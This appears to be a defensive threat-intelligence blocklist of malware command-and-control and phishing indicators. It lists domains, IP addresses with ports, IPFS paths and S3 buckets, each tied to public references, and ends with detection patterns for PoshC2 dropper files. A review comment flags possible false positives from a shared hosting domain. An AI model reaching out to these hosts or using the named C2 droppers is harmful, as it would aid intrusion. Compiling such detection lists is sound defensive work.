# Reference: https://www.virustotal.com/gui/file/6742c888a46175c1667d5f5c8eb50bbd902ec9104d14a6a8c0b44c613f1a5a81/detection

178.17.62.9:81
178.17.62.9:82
sslprouser.online

# Reference: https://x.com/smica83/status/1974938930278694920
# Reference: https://www.virustotal.com/gui/file/5a6eb07f992dcbbd97a391e455332bbeaeca1174739d98de2dbbead7e6e346c8/detection

seagreen-capybara-853936.hostingersite.com

# Reference: https://x.com/smica83/status/1974241200837198052
# Reference: https://www.virustotal.com/gui/file/1a9d6a860d046af0c18dc02a3e445c9bf70a55b6aa3f55b48f0e82241eef1d19/detection

facturastbs.shop
grupoatvsac.com
grupouwle.it.com
midasx.site
mnfgrupo.store
affs.grupoatvsac.com
bmx.mnfgrupo.store
cgf.facturastbs.shop
cgf.midasx.site
md.grupouwle.it.com

# Reference: https://x.com/smica83/status/1973792161289416786
# Reference: https://www.virustotal.com/gui/file/036501416a25798cc43e7f156fec0eb33485bb5da2be4a924714463f4248f1a9/detection

apocolypser.s3.us-east-1.amazonaws.com
reporter9128.s3.us-east-1.amazonaws.com

# Reference: https://x.com/smica83/status/1975137863999381806
# Reference: https://www.virustotal.com/gui/file/a2f153c69a85cedabb5f56c03d669b3b3cd8c6251df6cdd22612173e0a4e1411/detection

bafybeih7yhidsxpjat2izpmos5tnah5mi24xr3hhltfb3zlhhnsry4ncbi.ipfs.dweb.link
bafybeih7yhidsxpjat2izpmos5tnah5mi24xr3hhltfb3zlhhnsry4ncbi.ipfs.w3s.link
/ipfs/bafybeih7yhidsxpjat2izpmos5tnah5mi24xr3hhltfb3zlhhnsry4ncbi/
/bafybeih7yhidsxpjat2izpmos5tnah5mi24xr3hhltfb3zlhhnsry4ncbi/

# Reference: https://x.com/smica83/status/1975194167564460309
# Reference: https://x.com/skocherhan/status/1975228835575759210
# Reference: https://www.virustotal.com/gui/file/96049994641fea4958fbd17eff8bd04aeade173ead38a04989637a33cbda74c2/detection

147.185.211.211:33519

# Reference: https://x.com/cyber_ra1/status/1976170806637101401

45.43.11.138:8000

# Reference: https://x.com/suyog41/status/1976256819447132170
# Reference: https://www.virustotal.com/gui/file/dd2bbd0f59d2b87a971380e97cb759caf3192aa05617fd19d7a6a15218549c96/detection

globalsources.world

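# Reference: https://x.com/smica83/status/1976904744817078499
# Reference: https://www.virustotal.com/gui/file/b7e4f3359bd414470423ca62f7ea1ac497cad0aed6ad60df2217527fff2679cf/detection
# NOTE(review): the bare parent domain below appears to be a shared hosting domain (two unrelated numbered subdomains of it are listed in this file); matching on the parent may flag unrelated customer sites - confirm the false-positive impact before keeping it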

meusitehostgator.com.br
009423af623840eb89fb1759543879431.1851946.meusitehostgator.com.br

# Reference: https://x.com/BlinkzSec/status/1977041350643401174

38.128.251.126:7895

# Reference: https://x.com/smica83/status/1978600894217269424
# Reference: https://www.virustotal.com/gui/file/9cfdd19ba384d9b247c12d49368dbbe0720dc020e28c9af32a37f7c5edcb5be8/detection

nullarmor.cc

# Reference: https://x.com/smica83/status/1978771256762606024

http://45.9.148.46

# Reference: https://x.com/Malwar3Ninja/status/1978352792398856319

85.209.129.37:5504

# Reference: https://x.com/skocherhan/status/1978568094072156558

asusdriver.live

# Reference: https://x.com/smica83/status/1978880380187938929
# Reference: https://www.virustotal.com/gui/file/84f6f3a7c219b94c9689601a4b179880b12d661f38456f38f3b4e197566855f2/detection
# Reference: https://www.virustotal.com/gui/file/b67fb83392e59d2c62ba606c44cfaa9141d98bd7fed7028539b5ea70cc24ed87/detection
# Reference: https://www.virustotal.com/gui/file/cc5366e31fdaaad3fda3936f9ba67fce2e9c38f34c0607bea1a3855189edd4c0/detection

http://185.208.158.42

# Generic

/Posh_v2_dropper_x64.exe
/Posh_v4_dropper_x64.exe
/poshc2+user.txt
